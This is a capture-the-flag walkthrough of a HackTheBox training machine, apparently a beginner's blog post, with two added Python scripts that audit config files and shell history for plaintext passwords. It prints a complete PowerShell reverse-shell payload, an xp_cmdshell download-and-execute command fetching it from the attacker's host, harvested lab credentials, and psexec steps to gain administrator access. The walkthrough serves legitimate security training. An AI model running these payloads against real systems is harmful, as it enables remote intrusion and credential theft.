Getting Started With HackTheBox — Starting Point

Isaac Abramson
Jul 11, 2020

If you get stuck at any point, take your notes over to the HackTheBox subreddit: https://www.reddit.com/r/hackthebox/

The community is very welcoming, helpful, and open to questions. Don’t forget to give back once you’ve moved on to other machines. Happy hacking.

This assumes the following:

1. You’ve flashed Kali Linux to a flash drive

2. Installed/Livebooted Kali Linux on your machine

3. Updated Kali Linux, Updated Python, and Installed pip

4. Made a HackTheBox Account

If you haven’t completed that, you can find my guide to that here.

Login:

  1. Log in to your HackTheBox account here: www.hackthebox.eu/login
  2. Click the “Starting Point” tab under the Labs header

Starting Point: Software

  1. Log in to your HackTheBox.eu account
  2. Click the “Starting Point” tab under the Labs header
  3. Since we’ve already downloaded our software, and booted from it, we can click “next”

Starting Point: VPN Connection

1. Download the connection pack by clicking the “Download Connection Pack” button and selecting the server nearest to you. Make a note of the directory where you stored the connection pack (in this case, Desktop).

2. Open a terminal window and make your way to the connection pack using the “cd” and “ls” commands. Its name should be in a format similar to “username-startingpoint.ovpn”:

a. “cd Desktop”

b. “ls”

3. Once you’ve found your Starting Point connection pack, enter the following command: “sudo openvpn username-startingpoint.ovpn”, where username-startingpoint.ovpn is the case-sensitive name of your connection pack file.

4. Once your terminal outputs “Initialization Sequence Complete”, you’re connected. You can minimize the terminal window and move on to the next section by clicking “next”.

Starting Point: Enumeration

  1. Open a new terminal window and type the following command: “nmap -sC -sV 10.10.10.27”. This should give you a list of ports, some of which are open.
  2. Enter the following command in the terminal: “smbclient -N -L \\\\10.10.10.27\\”
  3. Enter the following command in the terminal: “smbclient -N \\\\10.10.10.27\\backups”
  4. Download the dtsConfig file by entering the “get prod.dtsConfig” command at the prompt that starts with smb: \>
  5. smb: \> “get prod.dtsConfig”
  6. Locate the “prod.dtsConfig” file on your machine and open it.
  7. It contains two pieces of information for your notes: “Password=M3g4c0rp123” & “User ID=ARCHETYPE\sql_svc”
  8. Once you’ve written these down in your notes, you can proceed to the next section by clicking the “next” button.
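The finding in steps 6–7 is a service-account password stored in clear text inside a package configuration file on an anonymously readable share. The following is an added example, not part of the original walkthrough: a Python audit that parses such a file and reports connection strings that embed a password. The XML layout of the sample is constructed; only the Password and User ID values come from the steps above.

```python
import xml.etree.ElementTree as ET

SECRET_KEYS = ("password", "pwd")
ACCOUNT_KEYS = ("user id", "uid")

# Constructed sample shaped like an SSIS package configuration file. Only the
# Password and User ID values come from the walkthrough; the rest is made up.
SAMPLE_DTSCONFIG = r"""<DTSConfiguration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\Package.Connections[Source].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Integrated Security=SSPI;Initial Catalog=Staging;</ConfiguredValue>
  </Configuration>
</DTSConfiguration>"""


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys.
    Quoted values that themselves contain ';' are not handled here."""
    pairs = {}
    for part in value.split(";"):
        key, sep, val = part.partition("=")
        if sep and key.strip():
            pairs[key.strip().lower()] = val.strip()
    return pairs


def find_plaintext_credentials(xml_text):
    """Return one finding per element whose text is a connection string
    carrying a non-empty password. The secret itself is never returned."""
    findings = []
    for node in ET.fromstring(xml_text).iter():
        pairs = parse_connection_string(node.text or "")
        secret = next((pairs[k] for k in SECRET_KEYS if pairs.get(k)), None)
        if secret is None:
            continue  # e.g. Integrated Security, or not a connection string
        account = next((pairs[k] for k in ACCOUNT_KEYS if pairs.get(k)), "<unknown>")
        findings.append({"element": node.tag, "account": account,
                         "secret_length": len(secret)})
    return findings


if __name__ == "__main__":
    for f in find_plaintext_credentials(SAMPLE_DTSCONFIG):
        print(f"plaintext password ({f['secret_length']} chars) "
              f"for {f['account']} in <{f['element']}>")
```

The second connection in the sample uses integrated authentication and produces no finding, which is the configuration that would have left nothing to recover from the share.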

Starting Point: Foothold

1. Using another terminal window, make your way through your unzipped impacket folder to mssqlclient.py using the cd command, in this case:

a. cd Desktop

b. cd impacket-master

c. cd examples

2. Once you’re in the folder containing mssqlclient.py, run the following command: “python3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth”

3. Enter the password you had in your notes from the prod.dtsConfig file: “M3g4c0rp123”

4. Enter the “SELECT IS_SRVROLEMEMBER ('sysadmin')” command at the SQL > prompt:

SQL > “SELECT IS_SRVROLEMEMBER ('sysadmin')”

5. Enter the following commands at the same prompt, one per line:

EXEC sp_configure 'Show Advanced Options', 1;
reconfigure;
sp_configure;
EXEC sp_configure 'xp_cmdshell', 1
reconfigure;
xp_cmdshell "whoami"

6. To find your own IP address, open a new terminal window and type “ifconfig”. It should be something in the form of “10.10.x.x”

7. To create a shell, open a new terminal window and type “nano shell.ps1”

8. Copy this text into a text editor:

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

and replace “10.10.14.3” with the IP address you found via ifconfig (yours).

9. Use “control+x” to save and exit nano.

10. To set up the mini server, open a new terminal window and type the following command: “python3 -m http.server 80”

11. Open a new terminal window and enter the following commands:

nc -lvnp 443
ufw allow from 10.10.10.27 proto tcp to any port 80,443

12. Open a text editor and paste the following:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.3/shell.ps1\");"

Replace the IP address “10.10.14.3” with your IP address.

13. Return to the terminal window from Starting Point: Foothold steps 2–5 and paste the edited command (with your ip) from step 12.

14. Once successfully done, click the “next” button to move on to the next section.

Starting Point: Privilege Escalation

1. Return to the terminal window from Starting Point: Foothold step 11 and enter the following command: “type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt”

2. This reveals:

User: “administrator”

Password: “MEGACORP_4dm1n!!”

Take note of these.

3. Open a new terminal window and make your way through the “impacket-master” directory to “examples”:

a. cd Desktop

b. cd impacket-master

c. cd examples

4. Run the following command: “python3 psexec.py administrator@10.10.10.27”

5. Enter the password from Starting Point: Privilege Escalation step 2: “MEGACORP_4dm1n!!”

6. You should now have administrative privileges, and you can verify by typing the command “whoami”

7. To return to the beginning directory, enter the command “cd\”

8. Make your way to the administrator’s desktop using the Windows commands “cd” and “dir”, which are equivalent to “cd” and “ls” in Linux:

a. “cd Users”

b. “cd Administrator”

c. “cd Desktop”

d. “dir” to see the contents of the Administrator’s desktop

9. When you see the root file, enter the following command: “type root.txt”, where root.txt is the name of the root file on the Desktop. This should print the root flag to your screen. Click “next” to move on to the next step.
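The escalation in steps 1–2 works because a command typed with a password on its command line was saved to the PSReadline history file. The following is an added example, not part of the original walkthrough: a Python audit that flags history lines carrying credentials. The two rules (a `net use` with an inline password, and `ConvertTo-SecureString -AsPlainText`) and the sample history, including its host names and password, are constructed for illustration.

```python
import re

# net use ... /user:NAME PASSWORD  (password given inline on the command line)
NET_USE_RE = re.compile(
    r"\bnet(?:\.exe)?\s+use\b.*?/user:(?P<user>\S+)\s+(?P<pw>\S+)", re.I)
# A literal secret converted to a SecureString in the console
SECURESTRING_RE = re.compile(r"\bConvertTo-SecureString\b.*-AsPlainText\b", re.I)

# Constructed history content; hosts, accounts and the password are made up.
SAMPLE_HISTORY = r"""Get-ChildItem C:\backups
net.exe use T: \\FILESRV01\backups /user:administrator EXAMPLE_Passw0rd
net use U: \\FILESRV01\public /user:guest /persistent:no
$cred = ConvertTo-SecureString 'EXAMPLE_Passw0rd' -AsPlainText -Force
net use V: \\FILESRV01\ops /user:opsadmin *
"""


def audit_history(text):
    """Return findings as dicts with line number, rule and account.
    The matched secret is deliberately left out of the result."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = NET_USE_RE.search(line)
        # '*' makes net use prompt, and '/...' is another switch, not a password
        if m and m["pw"] != "*" and not m["pw"].startswith("/"):
            findings.append({"line": lineno, "rule": "net-use-password",
                             "account": m["user"]})
        if SECURESTRING_RE.search(line):
            findings.append({"line": lineno, "rule": "plaintext-securestring",
                             "account": None})
    return findings


if __name__ == "__main__":
    for f in audit_history(SAMPLE_HISTORY):
        print(f)
```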

Starting Point: Complete

1. Copy and paste the root flag and submit it. Congratulations, you are now ready to move on to other boxes.
